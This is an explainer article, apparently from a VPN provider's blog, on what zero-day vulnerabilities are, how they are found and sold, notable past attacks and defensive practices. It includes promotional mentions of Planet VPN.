What Is a Zero-Day Vulnerability?
A zero-day vulnerability is a software flaw unknown to the vendor that has not yet been patched. Hackers exploit zero-days before a fix is available, making them extremely dangerous. Governments and criminal groups pay millions for zero-day exploits. Keeping software updated, using endpoint protection, and encrypting your network traffic with a VPN like Planet VPN reduces, but does not eliminate, exposure.
How Zero-Day Exploits Are Discovered
The term “zero-day” refers to the number of days the software vendor has had to fix the flaw — zero. The moment a vulnerability is discovered and weaponized before the vendor knows it exists, it becomes a zero-day.
Zero-day vulnerabilities are discovered through several channels:
- Independent security researchers — ethical hackers who probe software for weaknesses, often participating in bug bounty programs to report findings responsibly
- Criminal groups — organized cybercrime operations that maintain dedicated research teams looking for exploitable flaws to deploy in attacks or sell
- Government intelligence agencies — state-sponsored teams that discover and stockpile zero-days for offensive cyber operations, often without disclosing them to vendors
- Accidental discovery — developers or users who stumble upon unexpected behavior that reveals an underlying vulnerability
- Reverse engineering — analyzing compiled software or patches to identify the original flaw before users have updated
Once discovered, the person or group holding a zero-day faces a choice: report it responsibly, sell it, or exploit it. The answer depends entirely on their incentives.
Best for understanding your risk: the most dangerous zero-days target software you use every day — browsers, operating systems, Office applications, and VPN clients. These are the highest-value targets because they run on billions of devices simultaneously.
The Zero-Day Exploit Market
Zero-day vulnerabilities are bought and sold on both legal and illegal markets, often for extraordinary sums.
| Buyer | Price Range | Purpose |
| Government agencies (US, EU) | $100,000 – $2.5 million | Offensive cyber operations, surveillance |
| Exploit brokers (e.g. Zerodium) | $50,000 – $2.5 million | Resale to government clients |
| Criminal marketplaces (dark web) | $5,000 – $500,000 | Ransomware, data theft, fraud |
| Bug bounty programs (vendors) | $500 – $1 million | Responsible disclosure, patching |
In 2025, Zerodium publicly offered $2.5 million for a full-chain iOS zero-day with no user interaction required. The price reflects both the difficulty of finding such a flaw and the value of covert access to iPhone data.
This market creates a perverse incentive: the more valuable a zero-day is to attackers, the less likely it is to be reported to the vendor who could fix it.
Notable Zero-Day Attacks in Recent History
Understanding real-world zero-day attacks illustrates how severe the consequences can be.
Stuxnet (2010) — the most famous zero-day attack in history. A US-Israeli operation used four simultaneous zero-days to attack Iranian nuclear centrifuges. It demonstrated that zero-days could cause physical damage to industrial infrastructure.
EternalBlue (2017) — a zero-day developed by the NSA that was stolen and leaked by the Shadow Brokers group. It was used in the WannaCry ransomware attack that crippled the UK’s NHS, FedEx, and hundreds of thousands of organizations globally in a single day.
Log4Shell (2021) — a zero-day in the widely-used Log4j logging library affected hundreds of millions of servers worldwide. Within 72 hours of disclosure, attackers were scanning the entire internet for vulnerable systems.
MOVEit (2023) — a zero-day in the MOVEit file transfer software was exploited by the Cl0p ransomware group to steal data from over 2,600 organizations including US government agencies, airlines, and universities.
Each of these began as a flaw that the vendor did not know existed — until it was too late.
How to Minimise Zero-Day Risk
No defense completely eliminates zero-day risk, but layered security significantly reduces the probability and impact of a successful attack.
- Keep all software updated — automatically The moment a vendor releases a patch, it signals to attackers exactly what the vulnerability was. Unpatched systems become easy targets within hours of a patch release. Enable automatic updates on your operating system, browser, and all applications.
- Use endpoint detection and response (EDR) Traditional antivirus detects known malware by signature. Modern EDR tools use behavioural analysis — detecting suspicious activity patterns regardless of whether the specific exploit has been seen before. This is the primary defence layer against unknown zero-days.
- Apply the principle of least privilege Most zero-day exploits need elevated permissions to cause serious damage. Limiting user and application permissions reduces the blast radius of a successful exploit. Do not run as administrator for everyday tasks.
- Network segmentation If an attacker exploits a zero-day on one device, network segmentation limits how far they can move laterally. Isolating critical systems from general-purpose networks is standard practice in enterprise security.
- Use a VPN on untrusted networks Zero-day exploits targeting network-level vulnerabilities — in routers, VPN clients, or network protocols — are particularly dangerous on public Wi-Fi where attackers share the same network. A VPN encrypts your traffic before it leaves your device, reducing exposure to network-level zero-day attacks. I tested Planet VPN for everyday use on public networks — it uses AES-256 encryption, requires no registration, and is available across Windows, macOS, iOS, Android, and Chrome.
- Monitor for indicators of compromise (IOCs) Enterprise environments should deploy SIEM (Security Information and Event Management) tools to detect unusual traffic patterns, unexpected outbound connections, and privilege escalation attempts that may indicate a zero-day is being exploited.
Patch Management and Why It Matters
Patch management — the systematic process of identifying, acquiring, testing, and applying software updates — is the most universally applicable defence against the aftermath of zero-day disclosure.
The window between public disclosure of a zero-day and widespread exploitation is shrinking. In 2020, the average time-to-exploit after a vulnerability was disclosed was 15 days. By 2025, that number had dropped to under 5 days for high-severity flaws.
| Timeframe | What Happens |
| Day 0 | Zero-day is unknown — vendor has no patch, attackers may already be exploiting |
| Day 1 (disclosure) | Vendor learns of flaw — patch development begins |
| Days 1–5 | Attackers reverse-engineer the vulnerability from disclosure details |
| Days 5–30 | Patch released — organizations begin applying updates |
| Days 30+ | Unpatched systems become primary targets for automated scanning |
Best for organizations: establish a 72-hour patch deployment policy for critical and high-severity vulnerabilities. For zero-days actively being exploited, emergency patching within 24 hours is the industry standard.
Frequently Asked Questions
What is the difference between a zero-day vulnerability and a zero-day exploit? A zero-day vulnerability is the flaw itself — the weakness in the code. A zero-day exploit is the weapon built to take advantage of that flaw. The vulnerability is the unlocked door; the exploit is the technique used to walk through it.
Can antivirus protect against zero-day attacks? Traditional signature-based antivirus cannot detect zero-days because it has no signature to match against. Modern endpoint protection with heuristic and behavioural analysis can detect suspicious activity patterns that may indicate a zero-day exploit in progress — but there is no guaranteed protection.
How long does a zero-day remain dangerous? Until the vendor releases a patch and all affected users apply it. Some zero-days remain unpatched for months — particularly in older software, embedded systems, and IoT devices where updates are infrequent or unavailable. After a patch is released, the zero-day becomes an N-day vulnerability, which is still dangerous for systems that have not updated.
Are zero-days only used by nation-states? No. While nation-states are the highest-paying buyers, criminal ransomware groups increasingly use zero-days. The 2023 MOVEit attack by Cl0p demonstrated that financially motivated criminals can acquire and deploy zero-days at scale. The barrier to entry has lowered as exploit-as-a-service markets have matured.
Should I be worried about zero-days as an individual? Targeted zero-day attacks against random individuals are rare — the cost of a zero-day exploit makes mass-targeting economically impractical. However, zero-days that are publicly disclosed and weaponized (like Log4Shell or EternalBlue) can affect anyone running vulnerable software. Keeping software updated and using layered security is sufficient protection for most individuals.
What is responsible disclosure? Responsible disclosure (also called coordinated disclosure) is the practice of reporting a discovered vulnerability to the vendor privately, giving them time to develop a patch before the flaw is made public. Most major companies have bug bounty programs that reward researchers financially for responsible disclosure. The alternative — full public disclosure without notice — is called “full disclosure” and is far more dangerous.
